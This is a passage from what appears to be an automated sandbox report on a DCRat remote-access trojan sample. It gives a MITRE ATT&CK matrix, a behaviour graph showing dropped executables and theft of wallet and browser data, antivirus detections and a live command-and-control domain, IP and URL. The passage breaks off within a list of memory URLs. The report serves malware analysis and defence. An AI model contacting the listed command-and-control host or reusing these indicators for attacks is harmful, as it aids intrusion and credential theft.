                                    Source: Yara matchFile source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts141
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		1
                                    Disable or Modify Tools                                    		1
                                    OS Credential Dumping                                    		1
                                    System Time Discovery                                    		Remote Services1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter                                    		1
                                    DLL Side-Loading                                    		12
                                    Process Injection                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory3
                                    File and Directory Discovery                                    		Remote Desktop Protocol2
                                    Data from Local System                                    		2
                                    Non-Application Layer Protocol                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                                    Obfuscated Files or Information                                    		Security Account Manager157
                                    System Information Discovery                                    		SMB/Windows Admin Shares1
                                    Clipboard Data                                    		12
                                    Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                                    Software Packing                                    		NTDS351
                                    Security Software Discovery                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets2
                                    Process Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts33
                                    Masquerading                                    		Cached Domain Credentials251
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items251
                                    Virtualization/Sandbox Evasion                                    		DCSync1
                                    Application Window Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                                    Process Injection                                    		Proc Filesystem1
                                    Remote System Discovery                                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                                    System Network Configuration Discovery                                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579116 Sample: 8k1e14tjcx.exe Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 60 703648cm.renyash.top 2->60 64 Suricata IDS alerts for network traffic 2->64 66 Antivirus detection for dropped file 2->66 68 Antivirus / Scanner detection for submitted sample 2->68 70 11 other signatures 2->70 11 8k1e14tjcx.exe 3 6 2->11         started        signatures3 process4 file5 48 C:\...\ChainFontruntimeCrt.exe, PE32 11->48 dropped 50 PWC9d9T0TgxIE17d8k...fKmaENJQQSQ4ECN.vbe, data 11->50 dropped 84 Found many strings related to Crypto-Wallets (likely being stolen) 11->84 15 wscript.exe 1 11->15         started        signatures6 process7 signatures8 86 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->86 18 cmd.exe 1 15->18         started        process9 process10 20 ChainFontruntimeCrt.exe 3 24 18->20         started        24 conhost.exe 18->24         started        file11 40 C:\Windows\...\yeeQesPXxpnDuwPWqTnUoVbi.exe, PE32 20->40 dropped 42 C:\Users\user\Desktop\xHFppYee.log, PE32 20->42 dropped 44 C:\Users\user\Desktop\sUnrMbPq.log, PE32 20->44 dropped 46 10 other malicious files 20->46 dropped 72 Antivirus detection for dropped file 20->72 74 Multi AV Scanner detection for dropped file 20->74 76 Machine Learning detection for dropped file 20->76 78 Found many strings related to Crypto-Wallets (likely being stolen) 20->78 26 cmd.exe 1 20->26         started        signatures12 process13 signatures14 80 Uses ping.exe to sleep 26->80 82 Uses ping.exe to check the status of other devices and networks 26->82 29 yeeQesPXxpnDuwPWqTnUoVbi.exe 14 465 26->29         started        34 conhost.exe 26->34         started        36 PING.EXE 1 26->36         started        38 chcp.com 1 26->38         started        process15 dnsIp16 62 703648cm.renyash.top 37.44.238.250, 49732, 49734, 49736 HARMONYHOSTING-ASFR France 29->62 52 C:\Users\user\Desktop\xWHHAgmB.log, PE32 29->52 dropped 54 C:\Users\user\Desktop\phDaBATS.log, PE32 29->54 dropped 56 C:\Users\user\Desktop\otzSQnXU.log, PE32 29->56 dropped 58 4 other malicious files 29->58 dropped 88 Found many strings related to Crypto-Wallets (likely being stolen) 29->88 90 Tries to harvest and steal browser information (history, passwords, etc) 29->90 file17 signatures18

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    8k1e14tjcx.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    8k1e14tjcx.exe100%AviraVBS/Runner.VPG
                                    8k1e14tjcx.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\AppData\Local\Temp\KC0FFSqemJ.bat100%AviraBAT/Delbat.C
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\HqZFZAkM.log100%AviraHEUR/AGEN.1300079
                                    C:\Users\user\Desktop\hgJAcPUI.log100%AviraTR/AVI.Agent.updqb
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\sUnrMbPq.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\Desktop\ZXODDOCy.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\Desktop\xWHHAgmB.log100%AviraHEUR/AGEN.1300079
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe100%AviraHEUR/AGEN.1323342
                                    C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe100%AviraVBS/Runner.VPG
                                    C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe100%AviraHEUR/AGEN.1323342
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe100%AviraHEUR/AGEN.1323342
                                    C:\ChainagentComponent\ChainFontruntimeCrt.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\PjjNTCHQ.log100%AviraTR/AVI.Agent.updqb
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\HqZFZAkM.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\GFbXjJsj.log100%Joe Sandbox ML
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\sUnrMbPq.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\ZXODDOCy.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\QZsVJdpt.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\xWHHAgmB.log100%Joe Sandbox ML
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe100%Joe Sandbox ML
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe100%Joe Sandbox ML
                                    C:\ChainagentComponent\ChainFontruntimeCrt.exe100%Joe Sandbox ML
                                    C:\ChainagentComponent\ChainFontruntimeCrt.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Windows Security\BrowserCore\en-US\yeeQesPXxpnDuwPWqTnUoVbi.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\GFbXjJsj.log29%ReversingLabsWin32.Trojan.Generic
                                    C:\Users\user\Desktop\HZSnKfqJ.log25%ReversingLabs
                                    C:\Users\user\Desktop\HqZFZAkM.log4%ReversingLabs
                                    C:\Users\user\Desktop\MyEwMoxX.log17%ReversingLabs
                                    C:\Users\user\Desktop\PjjNTCHQ.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\QZsVJdpt.log29%ReversingLabsWin32.Trojan.Generic
                                    C:\Users\user\Desktop\ZXODDOCy.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\hgJAcPUI.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\odxAFePx.log17%ReversingLabs
                                    C:\Users\user\Desktop\otzSQnXU.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\phDaBATS.log25%ReversingLabs
                                    C:\Users\user\Desktop\sUnrMbPq.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\xHFppYee.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\xWHHAgmB.log4%ReversingLabs
                                    C:\Windows\AppReadiness\yeeQesPXxpnDuwPWqTnUoVbi.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    No Antivirus matches

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    703648cm.renyash.top
                                    		37.44.238.250
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://703648cm.renyash.top/provider_cpugame.phptrue
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.comyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designersGyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://703648cm.renyash.top/yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://duckduckgo.com/ac/?q=yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers/?yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn/bTheyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.com/designers?yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.tiro.comyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.fontbureau.com/designersyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.goodfont.co.kryeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.ecosia.org/newtab/yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 